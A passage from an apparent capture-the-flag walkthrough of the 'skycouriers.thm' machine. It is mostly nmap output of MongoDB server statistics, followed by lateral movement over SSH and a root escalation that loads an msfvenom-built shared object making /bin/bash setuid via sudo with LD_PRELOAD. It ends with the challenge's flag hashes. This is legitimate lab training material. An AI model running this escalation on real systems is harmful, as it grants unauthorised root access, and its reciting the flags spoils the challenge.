| lastSessionsCollectionJobEntriesRefreshed = 0
| lastTransactionReaperJobEntriesCleanedUp = 0
| transactionReaperJobCount = 33
| lastTransactionReaperJobTimestamp = 1714509906276
| sessionsCollectionJobCount = 33
| sessionCatalogSize = 0
| activeSessionsCount = 0
| lastSessionsCollectionJobDurationMillis = 0
| ok = 1.0
| pid = 553
| host = sky
| globalLock
| totalTime = 9660678000
| currentQueue
| total = 0
| writers = 0
| readers = 0
| activeClients
| total = 0
| writers = 0
| readers = 0
| opcounters
| insert = 0
| getmore = 0
| command = 76
| update = 0
| query = 34
| delete = 1
| trafficRecording
| running = false
| tcmalloc
| tcmalloc
| release_rate = 1.0
| aggressive_memory_decommit = 0
| pageheap_decommit_count = 8
| pageheap_total_decommit_bytes = 7757824
| transfer_cache_free_bytes = 183808
| central_cache_free_bytes = 237328
| formattedString = ------------------------------------------------
| MALLOC: 85323144 ( 81.4 MiB) Bytes in use by application
| MALLOC: + 3338240 ( 3.2 MiB) Bytes in page heap freelist
| MALLOC: + 237328 ( 0.2 MiB) Bytes in central cache freelist
| MALLOC: + 183808 ( 0.2 MiB) Bytes in transfer cache freelist
| MALLOC: + 812392 ( 0.8 MiB) Bytes in thread cache freelists
| MALLOC: + 2752512 ( 2.6 MiB) Bytes in malloc metadata
| MALLOC: ------------
| MALLOC: = 92647424 ( 88.4 MiB) Actual memory used (physical + swap)
| MALLOC: + 610304 ( 0.6 MiB) Bytes released to OS (aka unmapped)
| MALLOC: ------------
| MALLOC: = 93257728 ( 88.9 MiB) Virtual address space used
| MALLOC:
| MALLOC: 681 Spans in use
| MALLOC: 32 Thread heaps in use
| MALLOC: 4096 Tcmalloc page size
| ------------------------------------------------
| Call ReleaseFreeMemory() to release freelist memory to the OS (via madvise()).
| Bytes released to the OS take up virtual address space but no physical memory.
| total_free_bytes = 1234104
| spinlock_total_delay_ns = 0
| pageheap_unmapped_bytes = 610304
| max_total_thread_cache_bytes = 127926272
| pageheap_total_reserve_bytes = 90505216
| pageheap_reserve_count = 48
| thread_cache_free_bytes = 812968
| pageheap_free_bytes = 3338240
| pageheap_total_commit_bytes = 97652736
| pageheap_committed_bytes = 89894912
| current_total_thread_cache_bytes = 812968
| pageheap_scavenge_count = 8
| pageheap_commit_count = 80
| generic
| current_allocated_bytes = 85322568
| heap_size = 90505216
| connections
| awaitingTopologyChanges = 0
| exhaustIsMaster = 0
| exhaustHello = 0
| totalCreated = 6
| current = 2
| available = 51198
| active = 2
| network
| serviceExecutorTaskStats
| threadsRunning = 2
| executor = passthrough
| bytesIn = 987
| physicalBytesOut = 47061
| tcpFastOpen
| clientSupported = true
| accepted = 0
| serverSupported = true
| kernelSetting = 1
| compression
| snappy
| decompressor
| bytesOut = 0
| bytesIn = 0
| compressor
| bytesOut = 0
| bytesIn = 0
| zstd
| decompressor
| bytesOut = 0
| bytesIn = 0
| compressor
| bytesOut = 0
| bytesIn = 0
| zlib
| decompressor
| bytesOut = 0
| bytesIn = 0
| compressor
| bytesOut = 0
| bytesIn = 0
| numRequests = 11
| numSlowSSLOperations = 0
| numSlowDNSOperations = 0
| physicalBytesIn = 987
| bytesOut = 47061
| version = 4.4.6
| metrics
| getLastError
| default
| wtimeouts = 0
| unsatisfiable = 0
| wtime
| totalMillis = 0
| num = 0
| wtimeouts = 0
| commands
| _getNextSessionMods
| total = 0
| failed = 0
| _configsvrClearJumboFlag
| total = 0
| failed = 0
| collMod
| total = 0
| failed = 0
| replSetRequestVotes
| total = 0
| failed = 0
| listIndexes
| total = 66
| failed = 0
| _flushRoutingTableCacheUpdates
| total = 0
| failed = 0
| count
| total = 0
| failed = 0
| dropUser
| total = 0
| failed = 0
| currentOp
| total = 0
| failed = 0
| availableQueryOptions
| total = 0
| failed = 0
| getLog
| total = 0
| failed = 0
| appendOplogNote
| total = 0
| failed = 0
| distinct
| total = 0
| failed = 0
| _configsvrEnsureChunkVersionIsGreaterThan
| total = 0
| failed = 0
| update
| pipeline = 0
| failed = 0
| total = 0
| arrayFilters = 0
| setShardVersion
| total = 0
| failed = 0
| _configsvrDropDatabase
| total = 0
| failed = 0
| shutdown
| total = 0
| failed = 0
| listCommands
| total = 0
| failed = 0
| drop
| total = 0
| failed = 0
| isMaster
| total = 3
| failed = 0
| getShardVersion
| total = 0
| failed = 0
| profile
| total = 0
| failed = 0
| buildInfo
| total = 2
| failed = 0
| shardingState
| total = 0
| failed = 0
| killSessions
| total = 0
| failed = 0
| replSetSyncFrom
| total = 0
| failed = 0
| logout
| total = 0
| failed = 0
| replSetAbortPrimaryCatchUp
| total = 0
| failed = 0
| _recvChunkCommit
| total = 0
| failed = 0
| getDiagnosticData
| total = 0
| failed = 0
| grantPrivilegesToRole
| total = 0
| failed = 0
| setFreeMonitoring
| total = 0
| failed = 0
| replSetHeartbeat
| total = 0
| failed = 0
| listCollections
| total = 0
| failed = 0
| replSetStepDownWithForce
| total = 0
| failed = 0
| findAndModify
| pipeline = 0
| failed = 0
| total = 0
| arrayFilters = 0
| _configsvrCommitChunkMigration
| total = 0
| failed = 0
| commitTransaction
| total = 0
| failed = 0
| killAllSessionsByPattern
| total = 0
| failed = 0
| killCursors
| total = 0
| failed = 0
| abortTransaction
| total = 0
| failed = 0
| setFeatureCompatibilityVersion
| total = 0
| failed = 0
| _configsvrCommitChunkMerge
| total = 0
| failed = 0
| mapReduce
| total = 0
| failed = 0
| getDefaultRWConcern
| total = 0
| failed = 0
| getFreeMonitoringStatus
| total = 0
| failed = 0
| voteCommitIndexBuild
| total = 0
| failed = 0
| getDatabaseVersion
| total = 0
| failed = 0
| _mergeAuthzCollections
| total = 0
| failed = 0
| _configsvrDropCollection
| total = 0
| failed = 0
| replSetResizeOplog
| total = 0
| failed = 0
| cloneCollectionAsCapped
| total = 0
| failed = 0
| shardConnPoolStats
| total = 0
| failed = 0
| _configsvrEnableSharding
| total = 0
| failed = 0
| _configsvrBalancerStart
| total = 0
| failed = 0
| _addShard
| total = 0
| failed = 0
| grantRolesToUser
| total = 0
| failed = 0
| dbStats
| total = 0
| failed = 0
| whatsmyuri
| total = 1
| failed = 0
| replSetFreeze
| total = 0
| failed = 0
| collStats
| total = 0
| failed = 0
| usersInfo
| total = 0
| failed = 0
| getParameter
| total = 0
| failed = 0
| validate
| total = 0
| failed = 0
| waitForFailPoint
| total = 0
| failed = 0
| invalidateUserCache
| total = 0
| failed = 0
| updateRole
| total = 0
| failed = 0
| connPoolSync
| total = 0
| failed = 0
| internalRenameIfOptionsAndIndexesMatch
| total = 0
| failed = 0
| _recvChunkStart
| total = 0
| failed = 0
| _configsvrAddShardToZone
| total = 0
| failed = 0
| saslContinue
| total = 0
| failed = 0
| unsetSharding
| total = 0
| failed = 0
| _recvChunkAbort
| total = 0
| failed = 0
| top
| total = 0
| failed = 0
| lockInfo
| total = 0
| failed = 0
| stopRecordingTraffic
| total = 0
| failed = 0
| insert
| total = 0
| failed = 0
| startSession
| total = 0
| failed = 0
| startRecordingTraffic
| total = 0
| failed = 0
| grantRolesToRole
| total = 0
| failed = 0
| _configsvrAddShard
| total = 0
| failed = 0
| splitVector
| total = 0
| failed = 0
| splitChunk
| total = 0
| failed = 0
| connPoolStats
| total = 0
| failed = 0
| planCacheClear
| total = 0
| failed = 0
| _configsvrCommitChunkSplit
| total = 0
| failed = 0
| _configsvrRefineCollectionShardKey
| total = 0
| failed = 0
| setDefaultRWConcern
| total = 0
| failed = 0
| getCmdLineOpts
| total = 0
| failed = 0
| resetError
| total = 0
| failed = 0
| serverStatus
| total = 2
| failed = 0
| saslStart
| total = 0
| failed = 0
| rolesInfo
| total = 0
| failed = 0
| create
| total = 0
| failed = 0
| compact
| total = 0
| failed = 0
| getnonce
| total = 0
| failed = 0
| _configsvrBalancerStatus
| total = 0
| failed = 0
| revokeRolesFromUser
| total = 0
| failed = 0
| _getUserCacheGeneration
| total = 0
| failed = 0
| revokeRolesFromRole
| total = 0
| failed = 0
| revokePrivilegesFromRole
| total = 0
| failed = 0
| killOp
| total = 0
| failed = 0
| replSetUpdatePosition
| total = 0
| failed = 0
| getShardMap
| total = 0
| failed = 0
| updateUser
| total = 0
| failed = 0
| ping
| total = 0
| failed = 0
| repairDatabase
| total = 0
| failed = 0
| replSetReconfig
| total = 0
| failed = 0
| createIndexes
| total = 0
| failed = 0
| _flushDatabaseCacheUpdates
| total = 0
| failed = 0
| convertToCapped
| total = 0
| failed = 0
| replSetMaintenance
| total = 0
| failed = 0
| mergeChunks
| total = 0
| failed = 0
| setParameter
| total = 0
| failed = 0
| replSetGetStatus
| total = 1
| failed = 1
| renameCollection
| total = 0
| failed = 0
| fsyncUnlock
| total = 0
| failed = 0
| _migrateClone
| total = 0
| failed = 0
| replSetStepDown
| total = 0
| failed = 0
| cleanupOrphaned
| total = 0
| failed = 0
| replSetGetRBID
| total = 0
| failed = 0
| _configsvrShardCollection
| total = 0
| failed = 0
| refreshSessions
| total = 0
| failed = 0
| dataSize
| total = 0
| failed = 0
| createRole
| total = 0
| failed = 0
| aggregate
| total = 0
| failed = 0
| flushRouterConfig
| total = 0
| failed = 0
| prepareTransaction
| total = 0
| failed = 0
| killAllSessions
| total = 0
| failed = 0
| delete
| total = 1
| failed = 0
| connectionStatus
| total = 0
| failed = 0
| moveChunk
| total = 0
| failed = 0
| dbHash
| total = 0
| failed = 0
| replSetInitiate
| total = 0
| failed = 0
| planCacheListFilters
| total = 0
| failed = 0
| <UNKNOWN> = 0
| _configsvrMoveChunk
| total = 0
| failed = 0
| _configsvrCommitMovePrimary
| total = 0
| failed = 0
| planCacheSetFilter
| total = 0
| failed = 0
| replSetStepUp
| total = 0
| failed = 0
| _isSelf
| total = 0
| failed = 0
| createUser
| total = 0
| failed = 0
| _configsvrCreateDatabase
| total = 0
| failed = 0
| _recvChunkStatus
| total = 0
| failed = 0
| _shardsvrShardCollection
| total = 0
| failed = 0
| dropRole
| total = 0
| failed = 0
| _configsvrBalancerStop
| total = 0
| failed = 0
| _configsvrRemoveShardFromZone
| total = 0
| failed = 0
| _transferMods
| total = 0
| failed = 0
| _shardsvrCloneCatalogData
| total = 0
| failed = 0
| reIndex
| total = 0
| failed = 0
| _configsvrRemoveShard
| total = 0
| failed = 0
| driverOIDTest
| total = 0
| failed = 0
| applyOps
| total = 0
| failed = 0
| authenticate
| total = 0
| failed = 0
| _shardsvrMovePrimary
| total = 0
| failed = 0
| _configsvrUpdateZoneKeyRange
| total = 0
| failed = 0
| _configsvrMovePrimary
| total = 0
| failed = 0
| planCacheClearFilters
| total = 0
| failed = 0
| _cloneCollectionOptionsFromPrimaryShard
| total = 0
| failed = 0
| explain
| total = 0
| failed = 0
| _configsvrBalancerCollectionStatus
| total = 0
| failed = 0
| geoSearch
| total = 0
| failed = 0
| dropConnections
| total = 0
| failed = 0
| features
| total = 0
| failed = 0
| dropAllRolesFromDatabase
| total = 0
| failed = 0
| hello
| total = 0
| failed = 0
| dropAllUsersFromDatabase
| total = 0
| failed = 0
| dropIndexes
| total = 0
| failed = 0
| dropDatabase
| total = 0
| failed = 0
| coordinateCommitTransaction
| total = 0
| failed = 0
| getLastError
| total = 0
| failed = 0
| endSessions
| total = 1
| failed = 0
| _killOperations
| total = 0
| failed = 0
| find
| total = 34
| failed = 0
| listDatabases
| total = 0
| failed = 0
| mapreduce
| shardedfinish
| total = 0
| failed = 0
| fsync
| total = 0
| failed = 0
| _configsvrCreateCollection
| total = 0
| failed = 0
| replSetGetConfig
| total = 0
| failed = 0
| filemd5
| total = 0
| failed = 0
| checkShardingIndex
| total = 0
| failed = 0
| hostInfo
| total = 0
| failed = 0
| setIndexCommitQuorum
| total = 0
| failed = 0
| getMore
| total = 0
| failed = 0
| logRotate
| total = 0
| failed = 0
| query
| planCacheTotalSizeEstimateBytes = 0
| updateOneOpStyleBroadcastWithExactIDCount = 0
| ttl
| passes = 160
| deletedDocuments = 0
| repl
| stateTransition
| userOperationsKilled = 0
| userOperationsRunning = 0
| lastStateTransition =
| buffer
| sizeBytes = 0
| maxSizeBytes = 0
| count = 0
| syncSource
| numSelections = 0
| numTimesChoseDifferent = 0
| numTimesCouldNotFind = 0
| numTimesChoseSame = 0
| apply
| attemptsToBecomeSecondary = 0
| batchSize = 0
| ops = 0
| batches
| totalMillis = 0
| num = 0
| executor
| queues
| sleepers = 0
| networkInProgress = 0
| pool
| inProgressCount = 0
| shuttingDown = false
| unsignaledEvents = 0
| networkInterface = DEPRECATED: getDiagnosticString is deprecated in NetworkInterfaceTL
| network
| replSetUpdatePosition
| num = 0
| notPrimaryUnacknowledgedWrites = 0
| readersCreated = 0
| oplogGetMoresProcessed
| totalMillis = 0
| num = 0
| ops = 0
| bytes = 0
| getmores
| totalMillis = 0
| num = 0
| numEmptyBatches = 0
| notPrimaryLegacyUnacknowledgedWrites = 0
| initialSync
| completed = 0
| failures = 0
| failedAttempts = 0
| record
| moves = 0
| queryExecutor
| scannedObjects = 0
| scanned = 0
| collectionScans
| total = 0
| nonTailable = 0
| operation
| writeConflicts = 0
| scanAndOrder = 0
| cursor
| open
| total = 0
| noTimeout = 0
| pinned = 0
| timedOut = 0
| aggStageCounters
| $unionWith = 0
| $graphLookup = 0
| $bucketAuto = 0
| $sample = 0
| $skip = 0
| $planCacheStats = 0
| $currentOp = 0
| $unwind = 0
| $redact = 0
| $match = 0
| $facet = 0
| $listLocalSessions = 0
| $replaceWith = 0
| $sort = 0
| $sortByCount = 0
| $listSessions = 0
| $bucket = 0
| $collStats = 0
| $unset = 0
| $set = 0
| $_internalSplitPipeline = 0
| $_internalInhibitOptimization = 0
| $mergeCursors = 0
| $addFields = 0
| $project = 0
| $geoNear = 0
| $limit = 0
| $group = 0
| $count = 0
| $indexStats = 0
| $merge = 0
| $changeStream = 0
| $out = 0
| $replaceRoot = 0
| $lookup = 0
| document
| inserted = 0
| updated = 0
| deleted = 0
| returned = 0
| opcountersRepl
| insert = 0
| getmore = 0
| command = 0
| update = 0
| query = 0
|_ delete = 0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 30 16:45:22 2024 -- 1 IP address (1 host up) scanned in 29.77 seconds
Exploring MongoDB
27017,27018 - Pentesting MongoDB | HackTricks | HackTricks
sudo apt install -y mongodb-clients
mongo --host 127.0.0.1
webdeveloper user is in the clearLateral to webdeveloper
ssh webdeveloper@skycouriers.thm
webdeveloper is in the sudo group earlier
tar backup of the /var/www/html directory
strings on the binary confirms thisEscalate to Root
Looking again at the sudo -l output, I noticed the env_keep+=LD_PRELOAD setting. This indicates that when the binary is invoked using sudo whatever is set in the LD_PRELOAD environment variable for webdeveloper will persist in the sudo invocation as root.
For this task, we'll use msfvenom to generate a malicious shared object we can reference in the LD_PRELOAD environment variable.
msfvenom -p linux/x64/exec CMD="/bin/bash -c 'chmod u+s /bin/bash'" -f elf-so -o root.soThen, transfer it to the box like we did with the chisel binary before. Once you've got it stored on the box, just invoke the sudo command again with the required environment variable reference.
sudo LD_PRELOAD=/tmp/root.so /usr/bin/sky_backup_utility
Flags
User
63191e4ece37523c9fe6bb62a5e64d45
Root
3a62d897c40a815ecbe267df2f533ac6
